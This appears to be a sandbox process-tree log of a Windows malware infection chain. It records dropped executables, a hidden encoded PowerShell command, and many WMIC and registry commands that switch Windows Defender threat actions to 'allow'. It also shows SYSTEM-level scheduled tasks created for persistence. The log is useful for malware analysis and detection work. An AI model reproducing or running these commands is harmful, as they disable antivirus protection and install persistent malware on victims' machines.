C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:9568
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:1828
-
C:\Users\Admin\AppData\Local\Temp\950F.exeC:\Users\Admin\AppData\Local\Temp\950F.exe1⤵PID:11524
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\DB Software Laboratory\Svn Syncronize Management 1.7.3.2\install\97C955F\adv.msi" AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\950F.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1632862113 " AI_EUIMSI=""2⤵PID:8936
-
-
C:\Users\Admin\AppData\Local\Temp\ACCE.exeC:\Users\Admin\AppData\Local\Temp\ACCE.exe1⤵PID:6696
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:7272 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:9632
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵PID:11776
-
C:\Users\Admin\AppData\Local\Temp\prNnatYmCsQFEeCzn\OFTJvYQhcKRKyYZ\OWwqPRg.exeC:\Users\Admin\AppData\Local\Temp\prNnatYmCsQFEeCzn\OFTJvYQhcKRKyYZ\OWwqPRg.exe uG /site_id 668658 /S1⤵PID:9208
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &2⤵PID:6296
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"3⤵PID:3676
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True4⤵PID:7672
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True5⤵PID:4636
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True6⤵PID:9300
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"3⤵PID:9876
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True4⤵PID:9620
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True5⤵PID:9872
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True6⤵PID:8852
-
-
-
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"2⤵PID:7232
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵PID:11332
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:7984
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:10600
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:10856
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:10524
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:11012
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:11080
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:8160
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:4684
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:12060
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:11476
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:9560
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:12240
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:5960
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:9168
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:9284
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:12260
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:9368
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:9236
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:6080
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:5104
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:7652
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:9524
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵PID:9336
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:6684
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "YqJChhYnTMHzkMjCc" /SC once /ST 18:29:50 /RU "SYSTEM" /TR "\"C:\Windows\Temp\mlmrxyCihFugMjhe\GODdmYHTnpCwNhO\NvEKPxj.exe\" lA /site_id 668658 /S" /V1 /F2⤵
- Creates scheduled task(s)
PID:8288
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "YqJChhYnTMHzkMjCc"2⤵PID:12284
-
-
C:\Windows\Temp\mlmrxyCihFugMjhe\GODdmYHTnpCwNhO\CbvspmS.exeC:\Windows\Temp\mlmrxyCihFugMjhe\GODdmYHTnpCwNhO\CbvspmS.exe lA /site_id 394347 /S1⤵PID:10988
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &2⤵PID:9936
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"3⤵PID:10124
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True4⤵PID:10200
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True5⤵PID:1976
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True6⤵PID:11000
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"3⤵PID:8860
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True4⤵PID:9180
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True5⤵PID:4916
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True6⤵PID:8296
-
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bvmcjEjDUxHOOxIZsK"2⤵PID:10640
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:322⤵PID:10896
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵PID:7436
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:642⤵PID:7112
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵PID:7464
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\RQzLvVUNU\ZSEbwi.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "RulYNORIEfYpYdh" /V1 /F2⤵
- Creates scheduled task(s)
PID:10592
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "RulYNORIEfYpYdh2" /F /xml "C:\Program Files (x86)\RQzLvVUNU\lZESkqb.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:10332
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "RulYNORIEfYpYdh"2⤵PID:10756
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "RulYNORIEfYpYdh"2⤵PID:6104
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "sQKEyxOvETjkhD" /F /xml "C:\Program Files (x86)\EHjpVGHxoTMU2\YuDBhvh.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:11444
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "LUNOxqyZdvVpf2" /F /xml "C:\ProgramData\NKsRZGTfNWtvCUVB\LHrdWmT.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:11700
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "cXKEjEvxPbALHdiUE2" /F /xml "C:\Program Files (x86)\ZEsFaEtipdnTXqXtwBR\otHXkUz.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:8464
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "eoTgVxzVyVjpEcHcuxi2" /F /xml "C:\Program Files (x86)\DOWaNXZtDJLiC\meSQCNd.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:8564
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "TzpzstmaipgnuWYOU" /SC once /ST 02:04:37 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\mlmrxyCihFugMjhe\xHqMQxGc\tbrRZDp.dll\",#1 /site_id 394347" /V1 /F2⤵
- Creates scheduled task(s)
PID:9764
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "TzpzstmaipgnuWYOU"2⤵PID:9404
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "spuvsmvETjgD" /SC once /ST 13:32:55 /F /RU "Admin" /TR "\"C:\Users\Admin\AppData\Local\Temp\prNnatYmCsQFEeCzn\hQRcmRGk\mXXLSFk.exe\" vm /S"2⤵
- Creates scheduled task(s)
PID:8060
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "spuvsmvETjgD"2⤵PID:6864
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:11304
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:8856
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:8048
-
C:\Windows\Temp\mlmrxyCihFugMjhe\GODdmYHTnpCwNhO\NvEKPxj.exeC:\Windows\Temp\mlmrxyCihFugMjhe\GODdmYHTnpCwNhO\NvEKPxj.exe lA /site_id 668658 /S1⤵PID:11876
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &2⤵PID:5764
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"3⤵PID:9616
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True4⤵PID:9768
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True5⤵PID:8044
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True6⤵PID:1360
-
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bvmcjEjDUxHOOxIZsK"2⤵PID:10264
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:322⤵PID:9820
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵PID:11480
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:642⤵PID:10812
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵PID:11536
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\RQzLvVUNU\fxvDjq.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "RulYNORIEfYpYdh" /V1 /F2⤵
- Creates scheduled task(s)
PID:11464
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "RulYNORIEfYpYdh2" /F /xml "C:\Program Files (x86)\RQzLvVUNU\tJUHMRU.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:6860
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "RulYNORIEfYpYdh"2⤵PID:7488
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "RulYNORIEfYpYdh"2⤵PID:10552
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "sQKEyxOvETjkhD" /F /xml "C:\Program Files (x86)\EHjpVGHxoTMU2\mxBzmZu.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:10932
-
-
